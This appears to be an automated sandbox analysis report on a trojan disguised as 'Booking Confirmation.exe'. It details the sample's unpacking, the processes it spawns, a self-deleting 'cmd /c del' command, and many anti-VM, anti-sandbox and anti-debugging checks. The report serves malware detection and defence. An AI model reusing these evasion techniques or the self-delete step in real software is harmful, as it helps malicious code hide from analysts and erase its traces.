NbYO4jWNNNoSC4OQNtfSPtPNNNePjW7FNNNPtqiFtNNPtNNNNpXXjNTXyVNNvtzNNNXNNWmFjNNPa1VNNNXXv4bTNNNObNZNNNRXu4PXPLNNNbdNNOPH0cPNDNONNNNNNNZNNNNqwVhZP41ZQplAjNNNNNSNTjNNNPbPDNNV34NNODXNNOjPDNNV1A0pzyhM3ZNNNNNuOZNNTDNNNNwIIZN6OZNNONNNNNwE1IWENNNNCtGNNQ0ONNNV0Wfo2VNNNNNNNNNNtNNNIpIbtxWQjNNNCbOZjNJNNNONNNNBDNNNNfNNNNZNNNNVjNNNORNNNOYNNNNCjNNNOZNNNNTNNNNPtNNNNjNNNNWNNNNNDNNNNDNNNNONNNNNjNNNNZNNNNPNNNNNNNZODRNNNNNNNLNdtBJOjLNSjFJOjLNztYZOt8NQttNNNLN2jXzODLNwDBzODLN/tBzODLNltBzODLN4jBzODL

Source: classification engine

Classification label: mal100.troj.evad.winEXE@9/1@4/3

Source: C:\Users\user\Desktop\Booking Confirmation.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Booking Confirmation.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6952:120:WilError_01
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Mutant created: \Sessions\1\BaseNamedObjects\YvCWoKEDmRL

Source: Booking Confirmation.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Booking Confirmation.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\Booking Confirmation.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);

Source: Booking Confirmation.exe

ReversingLabs: Detection: 33%

Source: unknown	Process created: C:\Users\user\Desktop\Booking Confirmation.exe 'C:\Users\user\Desktop\Booking Confirmation.exe'
Source: unknown	Process created: C:\Users\user\Desktop\Booking Confirmation.exe C:\Users\user\Desktop\Booking Confirmation.exe
Source: unknown	Process created: C:\Users\user\Desktop\Booking Confirmation.exe C:\Users\user\Desktop\Booking Confirmation.exe
Source: unknown	Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Booking Confirmation.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process created: C:\Users\user\Desktop\Booking Confirmation.exe C:\Users\user\Desktop\Booking Confirmation.exe	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process created: C:\Users\user\Desktop\Booking Confirmation.exe C:\Users\user\Desktop\Booking Confirmation.exe	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Booking Confirmation.exe'	Jump to behavior

Source: C:\Users\user\Desktop\Booking Confirmation.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\Booking Confirmation.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Booking Confirmation.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Booking Confirmation.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: chkdsk.pdbGCTL source: Booking Confirmation.exe, 00000005.00000002.710165046.00000000015A8000.00000004.00000020.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000002.922870771.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: chkdsk.pdb source: Booking Confirmation.exe, 00000005.00000002.710165046.00000000015A8000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: Booking Confirmation.exe, 00000005.00000002.710355206.000000000195F000.00000040.00000001.sdmp, chkdsk.exe, 00000008.00000002.912945622.0000000004CC0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Booking Confirmation.exe, chkdsk.exe
Source:	Binary string: wscui.pdb source: explorer.exe, 00000006.00000002.922870771.0000000005A00000.00000002.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: Booking Confirmation.exe, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.Booking Confirmation.exe.2c0000.0.unpack, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.Booking Confirmation.exe.2c0000.0.unpack, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.Booking Confirmation.exe.2d0000.0.unpack, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.Booking Confirmation.exe.2d0000.0.unpack, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.Booking Confirmation.exe.dc0000.0.unpack, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.Booking Confirmation.exe.dc0000.1.unpack, BoundHandle.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_00417867 push edx; retf	5_2_00417869
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0041B124 push 423E369Ah; iretd	5_2_0041B12B
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_00416625 push ds; retf	5_2_00416626
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0041CEB5 push eax; ret	5_2_0041CF08
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0041CF6C push eax; ret	5_2_0041CF72
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0041DF6E push ds; ret	5_2_0041DF77
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0041CF02 push eax; ret	5_2_0041CF08
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0041CF0B push eax; ret	5_2_0041CF72
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_00410FA6 push ebx; ret	5_2_00410FA7
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018BD0D1 push ecx; ret	5_2_018BD0E4
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D3D0D1 push ecx; ret	8_2_04D3D0E4
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04336625 push ds; retf	8_2_04336626
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0433CEB5 push eax; ret	8_2_0433CF08
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0433CF02 push eax; ret	8_2_0433CF08
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0433CF0B push eax; ret	8_2_0433CF72
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0433DF6E push ds; ret	8_2_0433DF77
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0433CF6C push eax; ret	8_2_0433CF72
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04330FA6 push ebx; ret	8_2_04330FA7
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04337867 push edx; retf	8_2_04337869
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0433B124 push 423E369Ah; iretd	8_2_0433B12B

Source: initial sample

Static PE information: section name: .text entropy: 7.4686220922

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE0

Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match	File source: 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Booking Confirmation.exe PID: 7100, type: MEMORY
Source: Yara match	File source: 0.2.Booking Confirmation.exe.26148e8.1.raw.unpack, type: UNPACKEDPE

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\Booking Confirmation.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\Booking Confirmation.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Booking Confirmation.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe	RDTSC instruction interceptor: First address: 00000000043298E4 second address: 00000000043298EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe	RDTSC instruction interceptor: First address: 0000000004329B5E second address: 0000000004329B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\Booking Confirmation.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\Booking Confirmation.exe

Code function: 5_2_00409A90 rdtsc

5_2_00409A90

Source: C:\Users\user\Desktop\Booking Confirmation.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\Booking Confirmation.exe TID: 7104	Thread sleep time: -100831s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe TID: 7124	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 616	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 616	Thread sleep time: -68000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 3296	Thread sleep time: -60000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed

Source: Booking Confirmation.exe, 00000000.00000002.677064945.0000000008A0D000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: explorer.exe, 00000006.00000000.697485272.000000000FC60000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&t
Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000006.00000000.688998936.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000006.00000000.693819137.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp	Binary or memory string: k%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000006.00000000.689607624.0000000006650000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.693819137.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Booking Confirmation.exe, 00000000.00000002.671208724.0000000002798000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: explorer.exe, 00000006.00000002.920996195.0000000004755000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000006.00000000.688998936.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000006.00000000.693941917.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000006.00000000.688998936.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: Booking Confirmation.exe, 00000000.00000002.677064945.0000000008A0D000.00000004.00000001.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMwareRHWAVWDPWin32_VideoControllerB9X921H9VideoController120060621000000.000000-000.9770508display.infMSBDAGST7FLCTPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsP78EBRXL
Source: Booking Confirmation.exe, 00000000.00000002.671208724.0000000002798000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000006.00000000.693987799.000000000A784000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp	Binary or memory string: k"SOFTWARE\VMware, Inc.\VMware Tools
Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000006.00000000.688998936.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\Booking Confirmation.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Users\user\Desktop\Booking Confirmation.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Booking Confirmation.exe

Code function: 5_2_00409A90 rdtsc

5_2_00409A90

Source: C:\Users\user\Desktop\Booking Confirmation.exe

Code function: 5_2_0040ACD0 LdrLoadDll,

5_2_0040ACD0

Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0188C182 mov eax, dword ptr fs:[00000030h]	5_2_0188C182
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189A185 mov eax, dword ptr fs:[00000030h]	5_2_0189A185
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01892990 mov eax, dword ptr fs:[00000030h]	5_2_01892990
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E69A6 mov eax, dword ptr fs:[00000030h]	5_2_018E69A6
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018961A0 mov eax, dword ptr fs:[00000030h]	5_2_018961A0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018961A0 mov eax, dword ptr fs:[00000030h]	5_2_018961A0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E51BE mov eax, dword ptr fs:[00000030h]	5_2_018E51BE
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E51BE mov eax, dword ptr fs:[00000030h]	5_2_018E51BE
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E51BE mov eax, dword ptr fs:[00000030h]	5_2_018E51BE
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E51BE mov eax, dword ptr fs:[00000030h]	5_2_018E51BE
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018F41E8 mov eax, dword ptr fs:[00000030h]	5_2_018F41E8
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0186B1E1 mov eax, dword ptr fs:[00000030h]	5_2_0186B1E1
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0186B1E1 mov eax, dword ptr fs:[00000030h]	5_2_0186B1E1
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0186B1E1 mov eax, dword ptr fs:[00000030h]	5_2_0186B1E1
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01869100 mov eax, dword ptr fs:[00000030h]	5_2_01869100
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01869100 mov eax, dword ptr fs:[00000030h]	5_2_01869100
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01869100 mov eax, dword ptr fs:[00000030h]	5_2_01869100
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01884120 mov eax, dword ptr fs:[00000030h]	5_2_01884120
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01884120 mov eax, dword ptr fs:[00000030h]	5_2_01884120
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01884120 mov eax, dword ptr fs:[00000030h]	5_2_01884120
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01884120 mov eax, dword ptr fs:[00000030h]	5_2_01884120
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01884120 mov ecx, dword ptr fs:[00000030h]	5_2_01884120
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189513A mov eax, dword ptr fs:[00000030h]	5_2_0189513A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189513A mov eax, dword ptr fs:[00000030h]	5_2_0189513A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0188B944 mov eax, dword ptr fs:[00000030h]	5_2_0188B944
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0188B944 mov eax, dword ptr fs:[00000030h]	5_2_0188B944
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0186C962 mov eax, dword ptr fs:[00000030h]	5_2_0186C962
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0186B171 mov eax, dword ptr fs:[00000030h]	5_2_0186B171
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0186B171 mov eax, dword ptr fs:[00000030h]	5_2_0186B171
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01869080 mov eax, dword ptr fs:[00000030h]	5_2_01869080
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E3884 mov eax, dword ptr fs:[00000030h]	5_2_018E3884
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E3884 mov eax, dword ptr fs:[00000030h]	5_2_018E3884
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A90AF mov eax, dword ptr fs:[00000030h]	5_2_018A90AF
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018920A0 mov eax, dword ptr fs:[00000030h]	5_2_018920A0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018920A0 mov eax, dword ptr fs:[00000030h]	5_2_018920A0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018920A0 mov eax, dword ptr fs:[00000030h]	5_2_018920A0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018920A0 mov eax, dword ptr fs:[00000030h]	5_2_018920A0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018920A0 mov eax, dword ptr fs:[00000030h]	5_2_018920A0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018920A0 mov eax, dword ptr fs:[00000030h]	5_2_018920A0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189F0BF mov ecx, dword ptr fs:[00000030h]	5_2_0189F0BF
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189F0BF mov eax, dword ptr fs:[00000030h]	5_2_0189F0BF
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189F0BF mov eax, dword ptr fs:[00000030h]	5_2_0189F0BF
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018FB8D0 mov eax, dword ptr fs:[00000030h]	5_2_018FB8D0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018FB8D0 mov ecx, dword ptr fs:[00000030h]	5_2_018FB8D0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018FB8D0 mov eax, dword ptr fs:[00000030h]	5_2_018FB8D0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018FB8D0 mov eax, dword ptr fs:[00000030h]	5_2_018FB8D0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018FB8D0 mov eax, dword ptr fs:[00000030h]	5_2_018FB8D0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018FB8D0 mov eax, dword ptr fs:[00000030h]	5_2_018FB8D0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018658EC mov eax, dword ptr fs:[00000030h]	5_2_018658EC
